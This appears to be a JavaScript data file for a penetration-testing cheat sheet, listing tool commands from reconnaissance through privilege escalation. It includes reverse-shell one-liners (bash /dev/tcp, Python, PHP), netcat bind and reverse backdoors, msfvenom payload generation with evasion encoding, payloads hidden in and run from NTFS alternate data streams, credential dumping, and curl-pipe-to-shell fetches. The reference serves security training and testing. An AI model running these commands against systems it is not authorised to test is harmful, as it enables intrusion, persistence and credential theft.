const SECTIONS = [
  {
    id: 'recon',
    emoji: '\u{1F50D}',
    title: 'Reconnaissance',
    commands: [
      { title: 'nmap — Basic scan', desc: 'Default scan on target IP', diff: 'easy', code: 'nmap <target>' },
      { title: 'nmap — TCP SYN scan', desc: 'Stealth scan without completing TCP handshake', diff: 'easy', code: 'nmap -sS <target>' },
      { title: 'nmap — Specific port', desc: 'Scan a single port', diff: 'easy', code: 'nmap -p <port> <target>' },
      { title: 'nmap — Port range', desc: 'Scan a range of ports', diff: 'easy', code: 'nmap -p <start>-<end> <target>' },
      { title: 'nmap — All ports', desc: 'Full 65535 port TCP scan', diff: 'medium', code: 'nmap -p- -sC -sV -T4 <target>' },
      { title: 'nmap — UDP scan', desc: 'Scan common UDP ports', diff: 'medium', code: 'nmap -sU --top-ports 100 <target>' },
      { title: 'nmap — Service detection', desc: 'Identify service versions on open ports', diff: 'easy', code: 'nmap -sV <target>' },
      { title: 'nmap — OS detection', desc: 'Determine target operating system', diff: 'medium', code: 'nmap -O <target>' },
      { title: 'nmap — Aggressive scan', desc: 'OS + version + scripts + traceroute', diff: 'medium', code: 'nmap -A <target>' },
      { title: 'nmap — Ping sweep', desc: 'Discover live hosts on subnet', diff: 'easy', code: 'nmap -sn <subnet>' },
      { title: 'nmap — Scan subnet', desc: 'Scan all devices in CIDR range', diff: 'easy', code: 'nmap <subnet>' },
      { title: 'nmap — Multiple hosts', desc: 'Scan several targets at once', diff: 'easy', code: 'nmap <target1> <target2>' },
      { title: 'nmap — Verbose output', desc: 'Detailed scan progress', diff: 'easy', code: 'nmap -v <target>' },
      { title: 'nmap — NSE script', desc: 'Run a specific NSE script', diff: 'medium', code: 'nmap --script <script> <target>' },
      { title: 'nmap — Save TXT', desc: 'Save output to text file', diff: 'easy', code: 'nmap -oN <output> <target>' },
      { title: 'nmap — Save XML', desc: 'Save output to XML file', diff: 'easy', code: 'nmap -oX <output> <target>' },
      { title: 'nmap — All formats', desc: 'Normal, XML, grepable at once', diff: 'easy', code: 'nmap -oA <output> <target>' },
      { title: 'nmap — Timing template', desc: 'Aggressive timing (fast scan)', diff: 'easy', code: 'nmap -T4 <target>' },
      { title: 'nmap — Firewall bypass', desc: 'Skip host discovery (assume host is up)', diff: 'medium', code: 'nmap -Pn <target>' },
      { title: 'nmap — Randomize hosts', desc: 'Scan hosts in random order to evade detection', diff: 'hard', code: 'nmap --randomize-hosts <subnet>' },
      { title: 'nmap — Exclude hosts', desc: 'Exclude specific IPs from scan', diff: 'easy', code: 'nmap --exclude <exclude_ip> <subnet>' },
      { title: 'nmap — Traceroute', desc: 'Show packet route to target', diff: 'medium', code: 'nmap --traceroute <target>' },
      { title: 'nmap — OS fingerprint', desc: 'Combine OS + service version detection', diff: 'medium', code: 'nmap -O -sV <target>' },
      { title: 'nmap — DNS enumeration', desc: 'List hosts without scanning them', diff: 'medium', code: 'nmap -sL <subnet>' },
      { title: 'nmap — Version all', desc: 'Detect all possible services aggressively', diff: 'hard', code: 'nmap -sV --version-all <target>' },
      { title: 'whois', desc: 'Domain registration info', diff: null, code: 'whois <domain>' },
      { title: 'dnsrecon', desc: 'DNS enumeration', diff: null, code: 'dnsrecon -d <domain>' },
      { title: 'dig — TXT records', desc: 'Check SPF, DKIM, DMARC', diff: null, code: 'dig <domain> TXT' },
      { title: 'tls-scan — Single target', desc: 'Extract TLS cert metadata from IP', diff: 'medium', code: 'tls-scan -a <target> -p 443' },
      { title: 'tls-scan — Save output', desc: 'Save certificate data to JSONL', diff: 'medium', code: 'tls-scan -a <target> -p 443 -o <output>' },
      { title: 'tls-scan — From file', desc: 'Scan IPs from a list file', diff: 'medium', code: 'tls-scan -i <input_file> -o <output>' },
      { title: 'tls-scan — Port range', desc: 'Scan multiple TLS ports', diff: 'hard', code: 'tls-scan -a <target> -p 443 8443 993' },
      { title: 'tls-scan — CIDR range', desc: 'Scan entire subnet', diff: 'hard', code: 'tls-scan -a <subnet> -p 443 -o <output>' },
      { title: 'tls-scan — Custom timeout', desc: 'Adjust socket timeout', diff: 'medium', code: 'tls-scan -a <target> -p 443 -t 5 -o <output>' },
      { title: 'tls-scan — More workers', desc: 'Increase parallel threads', diff: 'medium', code: 'tls-scan -a <subnet> -p 443 -w 256 -o <output>' },
    ]
  },
  {
    id: 'scanning',
    emoji: '\u{1F4E1}',
    title: 'Scanning & Enumeration',
    commands: [
      { title: 'gobuster — Directory bruteforce', desc: 'Common web directories', diff: null, code: 'gobuster dir -u <url> -w /usr/share/wordlists/dirb/common.txt' },
      { title: 'gobuster — Subdomains', desc: 'DNS subdomain enumeration', diff: null, code: 'gobuster dns -d <domain> -w <wordlist>' },
      { title: 'ffuf — Fast web fuzzing', desc: 'Directory busting with filters', diff: null, code: 'ffuf -u <url>/FUZZ -w <wordlist> -mc 200,301,302' },
      { title: 'ffuf — Recursive', desc: 'Deep directory bruteforce', diff: 'medium', code: 'ffuf -recursion -recursion-depth 3 -u <url>/FUZZ -w <wordlist>' },
      { title: 'nikto', desc: 'Web server vulnerability scan', diff: null, code: 'nikto -h <target>' },
      { title: 'whatweb', desc: 'CMS, framework, version detection', diff: null, code: 'whatweb <url>' },
      { title: 'wpscan', desc: 'WordPress vulnerability scanner', diff: null, code: 'wpscan --url <url> --enumerate' },
      { title: 'masscan — Basic port scan', desc: 'Single port on target', diff: 'easy', code: 'masscan <target> -p <port>' },
      { title: 'masscan — Multiple ports', desc: 'Scan specific ports', diff: 'easy', code: 'masscan <target> -p <port1>,<port2>,<port3>' },
      { title: 'masscan — Port range', desc: 'Scan a range of ports', diff: 'easy', code: 'masscan <target> -p <start>-<end>' },
      { title: 'masscan — Subnet', desc: 'Scan subnet for specific port', diff: 'easy', code: 'masscan <subnet> -p <port>' },
      { title: 'masscan — All ports', desc: 'Full 65535 TCP port scan', diff: 'medium', code: 'masscan <target> -p 0-65535' },
      { title: 'masscan — Set rate', desc: 'Control packets per second', diff: 'medium', code: 'masscan <subnet> -p <port> --rate <rate>' },
      { title: 'masscan — Banner grab', desc: 'Retrieve service banners', diff: 'medium', code: 'masscan <subnet> -p <port> --banners' },
      { title: 'masscan — Save TXT', desc: 'List format output', diff: 'easy', code: 'masscan <subnet> -p <port> -oL <output>' },
      { title: 'masscan — Save XML', desc: 'XML output', diff: 'easy', code: 'masscan <subnet> -p <port> -oX <output>' },
      { title: 'masscan — Save JSON', desc: 'JSON output', diff: 'easy', code: 'masscan <subnet> -p <port> -oJ <output>' },
      { title: 'masscan — Save grepable', desc: 'Grepable output', diff: 'easy', code: 'masscan <subnet> -p <port> -oG <output>' },
      { title: 'masscan — Exclude IP', desc: 'Skip specific target', diff: 'easy', code: 'masscan <subnet> -p <port> --exclude <exclude_ip>' },
      { title: 'masscan — Exclude file', desc: 'Exclude IPs from file', diff: 'medium', code: 'masscan <subnet> -p <port> --excludefile <file>' },
      { title: 'masscan — Interface', desc: 'Bind to specific NIC', diff: 'medium', code: 'masscan <subnet> -p <port> -e <interface>' },
      { title: 'masscan — Source IP', desc: 'Spoof source address', diff: 'hard', code: 'masscan <subnet> -p <port> --source-ip <ip>' },
      { title: 'masscan — Randomize', desc: 'Randomize target order', diff: 'medium', code: 'masscan <subnet> -p <port> --randomize-hosts' },
      { title: 'masscan — Config file', desc: 'Load scan configuration', diff: 'medium', code: 'masscan -c <config>' },
      { title: 'masscan — Resume scan', desc: 'Resume paused scan', diff: 'medium', code: 'masscan --resume <config>' },
      { title: 'masscan — ICMP ping', desc: 'Discover live hosts', diff: 'easy', code: 'masscan <subnet> --ping' },
      { title: 'masscan — Open only', desc: 'Show only open ports', diff: 'easy', code: 'masscan <subnet> -p <port> --open-only' },
      { title: 'masscan — Retries', desc: 'Set retry count for probes', diff: 'medium', code: 'masscan <subnet> -p <port> --retries <count>' },
    ]
  },
  {
    id: 'web',
    emoji: '\u{1F310}',
    title: 'Web Exploitation',
    commands: [
      { title: 'sqlmap — Basic', desc: 'Auto-detect and exploit SQLi', diff: null, code: 'sqlmap -u "<url>?param=1" --batch' },
      { title: 'sqlmap — Dump database', desc: 'Extract all tables', diff: null, code: 'sqlmap -u "<url>?param=1" --dump --batch' },
      { title: 'curl — Basic request', desc: 'View response headers and body', diff: null, code: 'curl -iv <url>' },
      { title: 'curl — POST with data', desc: 'Send form/data to endpoint', diff: null, code: 'curl -X POST -d "user=admin&pass=test" <url>' },
      { title: 'curl — Custom headers', desc: 'Add auth cookies, user-agent', diff: null, code: 'curl -H "Authorization: Bearer <token>" -H "User-Agent: Mozilla/5.0" <url>' },
    ]
  },
  {
    id: 'exploit',
    emoji: '\u{1F5A5}',
    title: 'Exploitation Frameworks',
    commands: [
      { title: 'msfconsole — Start', desc: 'Launch Metasploit Framework', diff: 'easy', code: 'msfconsole' },
      { title: 'msfconsole — Start (quiet)', desc: 'Launch without banner', diff: 'easy', code: 'msfconsole -q' },
      { title: 'msfconsole — Search exploits', desc: 'Find modules by keyword', diff: 'easy', code: 'search <keyword>' },
      { title: 'msfconsole — Search with type', desc: 'Filter by module type', diff: 'medium', code: 'search type:exploit name:<keyword>' },
      { title: 'msfconsole — Use module', desc: 'Select exploit/aux module', diff: 'easy', code: 'use <module_path>' },
      { title: 'msfconsole — Show options', desc: 'View module parameters', diff: 'easy', code: 'show options' },
      { title: 'msfconsole — Set option', desc: 'Configure module parameter', diff: 'easy', code: 'set <option> <value>' },
      { title: 'msfconsole — Set global', desc: 'Set option across all modules', diff: 'medium', code: 'setg <option> <value>' },
      { title: 'msfconsole — Unset global', desc: 'Remove global variable', diff: 'medium', code: 'unsetg <option>' },
      { title: 'msfconsole — Set RHOSTS', desc: 'Define target IP', diff: 'easy', code: 'set RHOSTS <target>' },
      { title: 'msfconsole — Set RPORT', desc: 'Define target port', diff: 'easy', code: 'set RPORT <port>' },
      { title: 'msfconsole — Set payload', desc: 'Choose payload to deliver', diff: 'medium', code: 'set PAYLOAD <payload_path>' },
      { title: 'msfconsole — Set LHOST', desc: 'Local IP for reverse connection', diff: 'easy', code: 'set LHOST <ip>' },
      { title: 'msfconsole — Set LPORT', desc: 'Local port for callback', diff: 'easy', code: 'set LPORT <port>' },
      { title: 'msfconsole — Run exploit', desc: 'Execute the selected module', diff: 'easy', code: 'run' },
      { title: 'msfconsole — Check target', desc: 'Test if target is vulnerable', diff: 'medium', code: 'check' },
      { title: 'msfconsole — Show payloads', desc: 'List compatible payloads', diff: 'medium', code: 'show payloads' },
      { title: 'msfconsole — Show encoders', desc: 'List available encoders', diff: 'medium', code: 'show encoders' },
      { title: 'msfconsole — Show auxiliary', desc: 'List auxiliary modules', diff: 'medium', code: 'show auxiliary' },
      { title: 'msfconsole — Show post', desc: 'List post-exploitation modules', diff: 'medium', code: 'show post' },
      { title: 'msfconsole — Sessions list', desc: 'View all active sessions', diff: 'easy', code: 'sessions -l' },
      { title: 'msfconsole — Interact session', desc: 'Connect to session by ID', diff: 'easy', code: 'sessions -i <session_id>' },
      { title: 'msfconsole — Kill session', desc: 'Terminate session', diff: 'medium', code: 'sessions -k <session_id>' },
      { title: 'msfconsole — Background session', desc: 'Send session to background', diff: 'medium', code: 'background' },
      { title: 'msfconsole — Run post module', desc: 'Execute post-exploit module', diff: 'hard', code: 'run <post_module_path>' },
      { title: 'msfconsole — Add route', desc: 'Route traffic through session for pivoting', diff: 'hard', code: 'route add <subnet> <session_id>' },
      { title: 'msfconsole — Show routes', desc: 'Display active pivot routes', diff: 'medium', code: 'route' },
      { title: 'msfconsole — Set session pivot', desc: 'Route through existing session', diff: 'hard', code: 'setg SESSION <session_id>' },
      { title: 'msfconsole — Exit', desc: 'Close Metasploit', diff: 'easy', code: 'exit' },
      { title: 'msfvenom — List payloads', desc: 'Show all available payloads', diff: 'easy', code: 'msfvenom -l payloads' },
      { title: 'msfvenom — List encoders', desc: 'Show available encoders', diff: 'easy', code: 'msfvenom -l encoders' },
      { title: 'msfvenom — List formats', desc: 'Show output format options', diff: 'easy', code: 'msfvenom -l formats' },
      { title: 'msfvenom — List platforms', desc: 'Show target platform options', diff: 'easy', code: 'msfvenom -l platforms' },
      { title: 'msfvenom — List archs', desc: 'Show architecture options', diff: 'easy', code: 'msfvenom -l archs' },
      { title: 'msfvenom — Encode payload', desc: 'Encode with iterations for evasion', diff: 'hard', code: 'msfvenom -p <payload> LHOST=<ip> LPORT=<port> -e <encoder> -i <iterations> -f <format> -o <output>' },
      { title: 'msfvenom — Specify platform', desc: 'Set target OS for payload', diff: 'medium', code: 'msfvenom -p <payload> --platform <platform> -a <arch> LHOST=<ip> LPORT=<port> -f <format> -o <output>' },
      { title: 'msfvenom — Linux reverse shell', desc: 'Generate Linux ELF payload', diff: 'medium', code: 'msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf -o <output>' },
      { title: 'msfvenom — Windows meterpreter', desc: 'Windows reverse meterpreter', diff: 'medium', code: 'msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o <output>' },
      { title: 'msfvenom — Web PHP shell', desc: 'PHP reverse shell', diff: 'medium', code: 'msfvenom -p php/reverse_php LHOST=<ip> LPORT=<port> -o <output>' },
      { title: 'msfvenom — Python payload', desc: 'Python reverse shell', diff: 'medium', code: 'msfvenom -p python/shell_reverse_tcp LHOST=<ip> LPORT=<port> -o <output>' },
      { title: 'msfvenom — macOS payload', desc: 'macOS reverse shell', diff: 'hard', code: 'msfvenom -p osx/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f macho -o <output>' },
      { title: 'msfvenom — Android payload', desc: 'Android APK meterpreter', diff: 'hard', code: 'msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <output>' },
      { title: 'searchsploit', desc: 'Search Exploit-DB locally', diff: null, code: 'searchsploit <keyword>' },
    ]
  },
  {
    id: 'password',
    emoji: '\u{1F511}',
    title: 'Password Cracking',
    commands: [
      { title: 'hashcat — Identify hash', desc: 'Auto-detect hash type', diff: null, code: 'hashcat --identify hash.txt' },
      { title: 'hashcat — Dictionary attack', desc: 'MD5 with rockyou', diff: null, code: 'hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt' },
      { title: 'hashcat — NTLM', desc: 'Windows NTLM hash', diff: null, code: 'hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt' },
      { title: 'hashcat — bcrypt', desc: 'Slow hash, low speed expected', diff: null, code: 'hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt' },
      { title: 'john — Unshadow', desc: 'Combine passwd + shadow for cracking', diff: null, code: [
        'unshadow passwd shadow > hashes.txt',
        'john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt',
      ]},
      { title: 'hydra — SSH brute force', desc: 'SSH password attack', diff: null, code: 'hydra -l <user> -P <wordlist> <target> ssh' },
      { title: 'hydra — Web form', desc: 'POST login bruteforce', diff: 'hard', code: 'hydra -l <user> -P <wordlist> <target> http-post-form "/path:user=^USER^&pass=^PASS^:F=incorrect"' },
    ]
  },
  {
    id: 'shells',
    emoji: '\u{1F41A}',
    title: 'Reverse Shells & Listeners',
    commands: [
      { title: 'netcat — Listener', desc: 'Listen for incoming connection', diff: 'easy', code: 'nc -l -p <port>' },
      { title: 'netcat — Client', desc: 'Connect to listening server', diff: 'easy', code: 'nc <target> <port>' },
      { title: 'netcat — Chat server', desc: 'Two-way chat between hosts', diff: 'easy', code: [
        '# Server:',
        'nc -l -p <port>',
        '# Client:',
        'nc <server_ip> <port>',
      ]},
      { title: 'netcat — Pull file (receiver)', desc: 'Download file from sender', diff: 'medium', code: 'nc -l -p <port> > <file>' },
      { title: 'netcat — Pull file (sender)', desc: 'Send file to waiting receiver', diff: 'medium', code: 'nc <target> <port> < <file>' },
      { title: 'netcat — Push file (sender)', desc: 'Push file to waiting listener', diff: 'medium', code: 'cat <file> | nc <target> <port>' },
      { title: 'netcat — Push file (receiver)', desc: 'Receive pushed file', diff: 'medium', code: 'nc -l -p <port> > <file>' },
      { title: 'netcat — Linux backdoor', desc: 'Bind shell via -e flag', diff: 'hard', code: 'nc -l -p <port> -e /bin/sh' },
      { title: 'netcat — Windows reverse shell', desc: 'Reverse shell via -e flag', diff: 'hard', code: 'nc <target> <port> -e cmd.exe' },
      { title: 'netcat — Port check', desc: 'Test if port is open', diff: 'easy', code: 'nc -vvv -z -w3 <target> <port>' },
      { title: 'netcat — Named pipe relay', desc: 'Forward traffic through pivot', diff: 'hard', code: [
        '# On pivot:',
        'mkfifo <pipe>',
        'nc -l -p <local_port> < <pipe> | nc <target> <remote_port> > <pipe>',
        '# Then connect to pivot from attacker:',
        'nc <pivot_ip> <local_port>',
      ]},
      { title: 'Bash reverse shell', desc: 'One-liner for Linux targets', diff: null, code: 'bash -c \'bash -i >& /dev/tcp/<ip>/<port> 0>&1\'' },
      { title: 'Python reverse shell', desc: 'Python3 one-liner', diff: null, code: 'python3 -c \'import socket,subprocess,os;s=socket.socket();s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'' },
      { title: 'PHP reverse shell', desc: 'Web shell via PHP', diff: null, code: 'php -r \'$s=fsockopen("<ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");\'' },
      { title: 'Python HTTP server', desc: 'Quick file transfer server', diff: null, code: 'python3 -m http.server <port>' },
      { title: 'socat — Full TTY', desc: 'Fully interactive TTY shell', diff: 'hard', code: [
        '# listener:',
        'socat file:`tty`,raw,echo=0 TCP-LISTEN:<port>',
        '# target:',
        'socat exec:\'bash -li\',pty,stderr,setsid,sigint,sane TCP:<ip>:<port>',
      ]},
      { title: 'Upgrade shell — Python', desc: 'PTY upgrade after netcat', diff: null, code: [
        'python3 -c \'import pty;pty.spawn("/bin/bash")\'',
        'Ctrl+Z',
        'stty raw -echo; fg',
        'reset; export TERM=xterm',
      ]},
    ]
  },
  {
    id: 'lateral',
    emoji: '\u{1F504}',
    title: 'Lateral Movement',
    commands: [
      { title: 'impacket — psexec', desc: 'Execute as admin on Windows', diff: null, code: 'impacket-psexec <domain>/<user>:<pass>@<target>' },
      { title: 'impacket — wmiexec', desc: 'WMI execution (subtle)', diff: null, code: 'impacket-wmiexec <domain>/<user>:<pass>@<target>' },
      { title: 'impacket — secretsdump', desc: 'Dump hashes from DC', diff: null, code: 'impacket-secretsdump <domain>/<user>:<pass>@<target>' },
      { title: 'evil-winrm', desc: 'WinRM shell session', diff: null, code: 'evil-winrm -i <target> -u <user> -p <pass>' },
      { title: 'smbclient', desc: 'List SMB shares anonymously', diff: null, code: 'smbclient -L //<target> -N' },
      { title: 'ssh — Tunnel', desc: 'Local port forward through SSH', diff: null, code: 'ssh -L <local_port>:<remote_host>:<remote_port> <user>@<jump_host>' },
    ]
  },
  {
    id: 'osint',
    emoji: '\u{1F575}',
    title: 'OSINT',
    commands: [
      { title: 'theHarvester', desc: 'Email, domain, subdomain enumeration', diff: 'easy', code: 'theHarvester -d <domain> -b google,bing,linkedin' },
      { title: 'sherlock', desc: 'Find username across social networks', diff: 'easy', code: 'sherlock <username>' },
      { title: 'shodan', desc: 'Search for internet-connected devices', diff: 'medium', code: 'shodan search "port:22 country:US"' },
      { title: 'google dorks', desc: 'Google search operators for info gathering', diff: 'easy', code: [
        'site:target.com filetype:pdf',
        'intitle:"index of" password',
        'inurl:admin intitle:"login"',
      ]},
      { title: 'waybackurls', desc: 'Get historical URLs from Wayback Machine', diff: 'easy', code: 'waybackurls <domain>' },
      { title: 'holehe', desc: 'Check if email is used on services', diff: 'easy', code: 'holehe <email>' },
    ]
  },
  {
    id: 'forensics',
    emoji: '\u{1F52C}',
    title: 'Forensics',
    commands: [
      { title: 'autopsy', desc: 'GUI forensic browser', diff: 'medium', code: 'autopsy' },
      { title: 'volatility — Image info', desc: 'Get memory dump profile', diff: 'hard', code: 'volatility -f memory.dump imageinfo' },
      { title: 'volatility — Processes', desc: 'List running processes from dump', diff: 'hard', code: 'volatility -f memory.dump --profile=<profile> pslist' },
      { title: 'foremost', desc: 'Recover files by headers/footers', diff: 'medium', code: 'foremost -i disk.img -o output/' },
      { title: 'bulk_extractor', desc: 'Carve emails, credit cards from images', diff: 'easy', code: 'bulk_extractor -o output/ image.dd' },
      { title: 'exiftool', desc: 'Read file metadata', diff: 'easy', code: 'exiftool <file>' },
    ]
  },
  {
    id: 'cloud',
    emoji: '\u{2601}\u{FE0F}',
    title: 'Cloud & Active Directory',
    commands: [
      { title: 'aws — S3 ls', desc: 'List S3 buckets accessible', diff: 'easy', code: 'aws s3 ls --no-sign-request' },
      { title: 'aws — List bucket contents', desc: 'Enumerate S3 bucket objects', diff: 'easy', code: 'aws s3 ls s3://<bucket> --no-sign-request --recursive' },
      { title: 's3scanner', desc: 'Find open S3 buckets', diff: 'medium', code: 's3scanner --bucket <bucket>' },
      { title: 'BloodHound', desc: 'AD privilege escalation path analysis', diff: 'hard', code: [
        '# Collect data on DC:',
        'bloodhound-python -d <domain> -u <user> -p <pass> -c All -ns <dc_ip>',
        '# Then load the JSON files into BloodHound GUI',
      ]},
      { title: 'kerbrute', desc: 'Kerberos user enumeration', diff: 'medium', code: 'kerbrute userenum -d <domain> <userlist> --dc <dc_ip>' },
      { title: 'GetNPUsers — AS-REP roast', desc: 'Find users without Kerberos pre-auth', diff: 'hard', code: 'impacket-GetNPUsers <domain>/<user>:<pass> -outputfile hashes.txt' },
    ]
  },
  {
    id: 'privesc',
    emoji: '\u{2B06}',
    title: 'Privilege Escalation',
    commands: [
      { title: 'sudo -l', desc: 'List sudo privileges', diff: 'easy', code: 'sudo -l' },
      { title: 'SUID files', desc: 'Find setuid binaries', diff: 'easy', code: 'find / -perm -4000 -type f 2>/dev/null' },
      { title: 'writable scripts in PATH', desc: 'Hijack a script executed by root', diff: 'medium', code: 'find / -writable -type f 2>/dev/null | xargs ls -la' },
      { title: 'cron jobs', desc: 'List scheduled tasks', diff: 'medium', code: [
        'ls -la /etc/cron*',
        'cat /etc/crontab',
        'cat /var/spool/cron/crontabs/<user>',
      ]},
      { title: 'kernel exploit (LES)', desc: 'Linux Exploit Suggester', diff: 'hard', code: 'curl -s https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash' },
      { title: 'Windows — Service permissions', desc: 'Check for weak service ACLs', diff: 'hard', code: [
        'accesschk.exe -uwcqv <user> *',
        '# or with PowerShell:',
        'Get-Service | Where { $_.CanStopAndUninstall }',
      ]},
    ]
  },
  {
    id: 'windows',
    emoji: '\u{1F4BB}',
    title: 'Windows — Alternate Data Streams',
    commands: [
      { title: 'ADS — Create (cmd)', desc: 'Hide data in NTFS stream', diff: 'medium', code: 'echo <secret> > <file>:<stream>' },
      { title: 'ADS — Create (PowerShell)', desc: 'Create stream with PowerShell', diff: 'medium', code: 'Set-Content <file> -Stream <stream> -Value "<secret>"' },
      { title: 'ADS — Read (cmd)', desc: 'Display stream contents via more', diff: 'medium', code: 'more < <file>:<stream>' },

      { title: 'ADS — Read (PowerShell)', desc: 'Read stream with PowerShell', diff: 'medium', code: 'Get-Content <file> -Stream <stream>' },
      { title: 'ADS — List (dir)', desc: 'Show all streams on files', diff: 'easy', code: 'dir /r' },
      { title: 'ADS — List (PowerShell)', desc: 'Enumerate streams on file', diff: 'medium', code: 'Get-Item <file> -Stream *' },
      { title: 'ADS — Recursive hunt', desc: 'Find all streams in directory tree', diff: 'hard', code: 'Get-ChildItem -Recurse | ForEach-Object { Get-Item $_.FullName -Stream * }' },
      { title: 'ADS — Execute (PowerShell)', desc: 'Run executable from stream', diff: 'hard', code: 'Invoke-Item <file>:<stream>.exe' },
      { title: 'ADS — Execute (wmic)', desc: 'Launch stream via WMIC', diff: 'hard', code: 'wmic process call create "C:\\<path>\\<file>:<stream>.exe"' },
      { title: 'ADS — Download payload', desc: 'Store web download in ADS', diff: 'hard', code: 'Invoke-WebRequest -Uri <url> -OutFile <file>:<stream>.exe' },
      { title: 'ADS — Store executable', desc: 'Hide EXE inside text file', diff: 'hard', code: 'type <payload>.exe > <file>.txt:<payload>.exe' },
      { title: 'ADS — Hash stream', desc: 'Get hash of ADS content', diff: 'medium', code: 'Get-FileHash <file> -Stream <stream>' },
      { title: 'ADS — Delete (PowerShell)', desc: 'Remove specific stream', diff: 'medium', code: 'Remove-Item <file> -Stream <stream>' },
      { title: 'ADS — Scan (Sysinternals)', desc: 'Enumerate streams recursively', diff: 'medium', code: 'streams.exe -s <directory>' },
      { title: 'ADS — Delete (Sysinternals)', desc: 'Remove streams from file', diff: 'medium', code: 'streams.exe -d <file>' },
    ]
  },
  {
    id: 'crypto',
    emoji: '\u{1F510}',
    title: 'Cryptography & Encoding',
    commands: [
      { title: 'openssl — Generate RSA key pair', desc: '2048-bit private/public', diff: null, code: [
        'openssl genrsa -out private.pem 2048',
        'openssl rsa -in private.pem -pubout > public.pem',
      ]},
      { title: 'openssl — Self-signed cert', desc: 'For HTTPS testing', diff: null, code: 'openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes' },
      { title: 'Base64 — Encode/Decode', desc: 'Shell one-liners', diff: null, code: [
        'echo -n "<text>" | base64    # encode',
        'echo "<base64>" | base64 -d  # decode',
      ]},
      { title: 'xxd — Hex dump / unhex', desc: 'Binary to hex and back', diff: null, code: [
        'xxd <file>              # hex dump',
        'xxd -r -p <hex.txt>     # hex to binary',
      ]},
    ]
  },
  {
    id: 'misc',
    emoji: '\u{1F9F0}',
    title: 'Misc Utilities',
    commands: [
      { title: 'linpeas — Linux privesc', desc: 'Auto-enumeration script for Linux', diff: null, code: 'curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh' },
      { title: 'winpeas — Windows privesc', desc: 'Auto-enumeration for Windows', diff: null, code: [
        'curl -L -o winpeas.exe https://github.com/peass-ng/PEASS-ng/releases/latest/download/winpeasx64.exe',
        '.\\winpeas.exe',
      ]},
      { title: 'steghide', desc: 'Extract hidden data from image', diff: null, code: 'steghide extract -sf image.jpg' },
      { title: 'binwalk', desc: 'Extract files from firmware/binaries', diff: null, code: 'binwalk --dd=".*" firmware.bin' },
      { title: 'strings', desc: 'Extract readable text from binary', diff: null, code: 'strings <file> | grep -i "flag\\|password\\|secret"' },
    ]
  },
];
